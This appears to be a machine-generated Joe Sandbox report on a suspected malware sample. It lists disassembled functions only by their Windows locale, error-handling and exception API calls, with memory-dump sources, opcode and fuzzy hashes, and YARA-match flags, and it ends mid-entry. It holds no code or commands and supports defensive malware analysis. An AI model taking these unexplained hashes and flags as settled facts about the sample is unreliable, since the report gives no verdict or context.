                                                              • Instruction ID: 8b60ec8aba18d19e0b1699fcbdd809059dfaa92815d2c67c734a72e551630106
                                                              • Opcode Fuzzy Hash: fae35ebe87516e02c0f0bf487ac7506629a6c036fab7dd0aa9bbd0b92e43d1b0
                                                              • Instruction Fuzzy Hash: 6831D474D0122D9BCB21DF25D888BDDBBB4BF48310F5041EAE40CA7291E7349B858F55
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • EnumSystemLocalesW.KERNEL32(00601D14,00000001,00000000,?,-00000050,?,00602348,00000000,?,?,?,00000055,?), ref: 00601C60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID: H#`
                                                              • API String ID: 2417226690-1926435667
                                                              • Opcode ID: 66a4a9577d6f6110711b6ed644c5a9cc32635f53555ab9bfbe35c814850fb329
                                                              • Instruction ID: e17e720f5634edd069e25217df66857c32ef55130284c95c685c06b29053747b
                                                              • Opcode Fuzzy Hash: 66a4a9577d6f6110711b6ed644c5a9cc32635f53555ab9bfbe35c814850fb329
                                                              • Instruction Fuzzy Hash: B61129362403055FEB1C9F38C8916BBBB93FF81358B14442CE5464B780D375A942C740
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
                                                              • Instruction ID: a96c6e2abe1997f3409c524aa128d8bb17d37e38c9f72903ed1f925a0939084b
                                                              • Opcode Fuzzy Hash: 82f163e4761bd8698f5f866852cd4e0229762b1cc4392098708726b2277ebcfa
                                                              • Instruction Fuzzy Hash: B072A830628B888FDB69DF28C8856B9B7E5FB98310F58462DD89BC7241DF34E542CB45
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005FC9D8,?,?,00000008,?,?,00606395,00000000), ref: 005FCC0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 9e3122275854078bbe7967ccf08daa5a8d74791b1c78a34b97617a48ced50947
                                                              • Instruction ID: f3c6d7a9173701ac86fe68d99b06a0bba0e5fd8b20dc04c2313261e083abb295
                                                              • Opcode Fuzzy Hash: 9e3122275854078bbe7967ccf08daa5a8d74791b1c78a34b97617a48ced50947
                                                              • Instruction Fuzzy Hash: EEB1493561060D9FD715CF28C58AB657FA0FF05364F258668EAAACF2A1C339E981CB40
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005EA79B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: a0feca9874ff3fa13470dca4c6338b0a688f82049df2d31006e61530d5c30251
                                                              • Instruction ID: 4da564a15bf4796c1e2c4a277a089605fb6f45cca8b71acf434532ef8e2799bd
                                                              • Opcode Fuzzy Hash: a0feca9874ff3fa13470dca4c6338b0a688f82049df2d31006e61530d5c30251
                                                              • Instruction Fuzzy Hash: 22518CB1D142458FDB18CF76E8917AABBF1FB48311F18C56AC885EB250E774A901CF61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd4894ceb0907154c0860a953916034d44d01c8f57b370f8ad8c6a0665b1ea58
                                                              • Instruction ID: a6604c6a428addedd6e5a1b9dc47e0cfff1ebaef6abb20c8175ff00c0fad71bc
                                                              • Opcode Fuzzy Hash: fd4894ceb0907154c0860a953916034d44d01c8f57b370f8ad8c6a0665b1ea58
                                                              • Instruction Fuzzy Hash: 764194B580421DAFDB24DF69CC89ABABBB9BF45300F1442DDE509D3211DA349E448F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 6836d3c767e0b425f26eb921c8c3b68b9a3390701c2a5a682394b5213d252b74
                                                              • Instruction ID: 554802ec7b036f3bf3ffbde79ff0e845150c286f4466335a0e972f30358ed04a
                                                              • Opcode Fuzzy Hash: 6836d3c767e0b425f26eb921c8c3b68b9a3390701c2a5a682394b5213d252b74
                                                              • Instruction Fuzzy Hash: 69C1273050068BCFCB28CF69C988A7ABFB5BF46304F185629D5E697692CB35ED05CB10
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00601FBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: 7d29714b01414c7deea62cca7d4f76fb4adeb9c7694a0229f906aff0a6486bf1
                                                              • Instruction ID: b564f0a3f4407278effd7aec16f0a608ddf341f535c8e86d7f1bb258ddb63a24
                                                              • Opcode Fuzzy Hash: 7d29714b01414c7deea62cca7d4f76fb4adeb9c7694a0229f906aff0a6486bf1
                                                              • Instruction Fuzzy Hash: 2C21B671590207ABDB2CAA24DC59ABB77A9FF44304F10407AFE06D7281EB34AD44C750
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00601F30,00000000,00000000,?), ref: 006021C2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: e8d3bff2517a5290d566a061d7e09ffe6f666a1a10c4c31bc498a43831410d9c
                                                              • Instruction ID: c7565ecfac8036005211b80a5def591327c76c3cb0d00966f4164c819ee60f00
                                                              • Opcode Fuzzy Hash: e8d3bff2517a5290d566a061d7e09ffe6f666a1a10c4c31bc498a43831410d9c
                                                              • Instruction Fuzzy Hash: 8401D632680117ABDB1C5AA4C8AEBFB776AEF40354F154468ED12A32C1EA34FF41C690
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • EnumSystemLocalesW.KERNEL32(00601F67,00000001,00000000,?,-00000050,?,00602310,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00601CD3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 9a87ca9f1921d8e5d737d102ec325e0f3fbec3939bbebe50cb63021560c7c2b5
                                                              • Instruction ID: 3b38f9485682b274162490fe41da4340c4cd90f9761736ada5a1d5ac04a16cf5
                                                              • Opcode Fuzzy Hash: 9a87ca9f1921d8e5d737d102ec325e0f3fbec3939bbebe50cb63021560c7c2b5
                                                              • Instruction Fuzzy Hash: E1F022362803085FEB186F349885ABB7BD6FB8232CB05442CFA018B6C0D2B5AC01CA50
                                                              APIs
                                                                • Part of subcall function 005F150A: EnterCriticalSection.KERNEL32(-0002B867,?,005F6107,?,00616B20,00000008,005F62CB,CE3BFFFF,005EDE01,?,CE3BFFFF,005EDE01,005E112E,?,005F13BE), ref: 005F1519
                                                              • EnumSystemLocalesW.KERNEL32(005F86E3,00000001,00616C80,0000000C,005F8B18,00000000), ref: 005F8728
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                              • String ID:
                                                              • API String ID: 1272433827-0
                                                              • Opcode ID: 8e764e6814fef9a4c00305147b4f6e8e1c0b2a705037df59fb94431684b16a73
                                                              • Instruction ID: a3deb973064e7fb88f00cc0fe9733f1643adbd7d913ed8331e793bd1aaf1879e
                                                              • Opcode Fuzzy Hash: 8e764e6814fef9a4c00305147b4f6e8e1c0b2a705037df59fb94431684b16a73
                                                              • Instruction Fuzzy Hash: 10F04976A40309DFDB00EFA8E846BAD7BF1FB48721F10805AF510DB2A0CB7959008F90
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • EnumSystemLocalesW.KERNEL32(00601AFC,00000001,00000000,?,?,0060236A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00601BDA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: c951cdb95ae1a5b40f68f75338abbebb88124d4808a42af32c50442fee880524
                                                              • Instruction ID: 125a3a6e283f715748772ec1c1dfa356efa501583a87540cf89bac5ac84e5827
                                                              • Opcode Fuzzy Hash: c951cdb95ae1a5b40f68f75338abbebb88124d4808a42af32c50442fee880524
                                                              • Instruction Fuzzy Hash: 61F0E53A38020957CB08AF79D8A9AAB7F96EFC2724B064098EB058F6D1D7759942C750
                                                              APIs
                                                              • GetVersionExA.KERNEL32(00000094), ref: 005E2E80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 5ddd8983a1afa289be40a2fc4c7dc396499965b492db92d29bdc30bfb74340c6
                                                              • Instruction ID: d2ba09f74f9874cd3f640f74caebf7c5274d6cb1810b65222d6181d1251361bd
                                                              • Opcode Fuzzy Hash: 5ddd8983a1afa289be40a2fc4c7dc396499965b492db92d29bdc30bfb74340c6
                                                              • Instruction Fuzzy Hash: 87E09270C0032896FF389A72DC06FB6777CBB51305F4000D8E64C52182E7758A4A8F62
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,005F4DAF,?,20001004,00000000,00000002,?,?,005F43A1), ref: 005F8C50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 6e8ac69c02d79d3fd493b7fc07d38b49b5dd5eac6a558d19f71cc30926d9033c
                                                              • Instruction ID: 1f2e51f8732c380b3fbd019952403365b6381a5ce4af48b9ded4239e8fb0d4c1
                                                              • Opcode Fuzzy Hash: 6e8ac69c02d79d3fd493b7fc07d38b49b5dd5eac6a558d19f71cc30926d9033c
                                                              • Instruction Fuzzy Hash: 25E01A3154111DBBCF122F60DC08ABE3F26FF447A1F044410FE456A261CB368D20AAA4
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000A686,005E9E6C), ref: 005EA67F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: de45990036769d17e162b070c2eecaff981167b2d7529574abf0776b2ef42b1e
                                                              • Instruction ID: 64d277bb7dfbca47a241a47ccc0d3ad65f1bc2d77c9f0b7161a4eda5e2810357
                                                              • Opcode Fuzzy Hash: de45990036769d17e162b070c2eecaff981167b2d7529574abf0776b2ef42b1e
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 32095ff44f495dfdc75cc790191de8233210c8c0fab4d97dd96a0816b6683fca
                                                              • Instruction ID: d8221c5e7e7bd4cdb03549e2864ae8fe631f0d6a4c2873bafe91fb280fcd391e
                                                              • Opcode Fuzzy Hash: 32095ff44f495dfdc75cc790191de8233210c8c0fab4d97dd96a0816b6683fca
                                                              • Instruction Fuzzy Hash: D9A012309001008B87004F316A0464937BB59013C0708D06A6405C0020D62040405F10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                              • Instruction ID: a9628147bcf7a6b17228ceb9a55bac32a6dcb634aab7cecca7238de986d92d88
                                                              • Opcode Fuzzy Hash: 50302c5bc3930a53f7dd9e937765325ad25ded17b8d9d665e66fbcc8a784ede8
                                                              • Instruction Fuzzy Hash: D5427971618381AFDB24CF24C944B7BBBE9EF88704F08496DF9959B241D734E941CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 744e2b147d42cd38dd97fb1edf12c1da7266ace7ba5a593af8519508b0318ae9
                                                              • Instruction ID: 45f16a42e162995fdf338f4382fd096641de4806dbead657d40a81c5a9a61324
                                                              • Opcode Fuzzy Hash: 744e2b147d42cd38dd97fb1edf12c1da7266ace7ba5a593af8519508b0318ae9
                                                              • Instruction Fuzzy Hash: 72322432D69F054DD7239634C922336A65AAFB73C4F15E727E81AB59A6EF2DC4834100
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                              • Instruction ID: f832d95c897acb4ebf1709fafd2482313931031c0884fe1463c3790c4bfdad8b
                                                              • Opcode Fuzzy Hash: 54a19d4bb2a1054924f4bfc2abc68d4f449b9e1de2d679b882cf74b481fb4666
                                                              • Instruction Fuzzy Hash: FDD17530718B498BDB29EF2998997FEB7E5FB58705F04422EE85AC3250DF30E5118B81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                              • Instruction ID: e9f934fb6abd56ba36fe05759a4166c6fef377aa1ca022ef719f7bfa9a9f3133
                                                              • Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
                                                              • Instruction Fuzzy Hash: 64D15C31518B488FDB59EF28C889AEAB7E1FF99310F14466DE88BC7255DF30E5428B41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                              • Instruction ID: f5b87648098f9311119fc0cc71688eacea0c45cb39f942290bc8fe2dd86a115b
                                                              • Opcode Fuzzy Hash: 5d17924f1650dce35aa6cfa67234e302229330514130ed1fd0e34ce5b20ef98f
                                                              • Instruction Fuzzy Hash: D3B1B530734A895BCB19EB2ACD956BAB3D1FB89301F58426DC94BC7245DB24F902CB85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 4afc6f49a78bbe3c932c0f208ab7137937a03378f0d913431d7502ed916df784
                                                              • Instruction ID: 4c1e2d3548a8bc96c9d6b3ce0cc3817a3b9737f1bbedc18736e821d5e981cdf0
                                                              • Opcode Fuzzy Hash: 4afc6f49a78bbe3c932c0f208ab7137937a03378f0d913431d7502ed916df784
                                                              • Instruction Fuzzy Hash: B4B117755407068BCB3C9F25CC96BF7B3AAFB85308F14452DEA438A6D0EA75A985CB10
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_36c0000_LisectAVT_2403002B_185.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                                                              • Instruction ID: dda3f69604f39ef667a54b6fc503ba781b4ca5766555468746a9a3e28b990152
                                                              • Opcode Fuzzy Hash: 2464d5d1c8744b7938e622091fc8299d1c098dc56941e33080af8fbc6eb05a52
                                                              • Instruction Fuzzy Hash: 96A13E31508A4C8FDB55EF28C889BEAB7F9FB58315F14466EE84AC7160EB30D644CB85
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
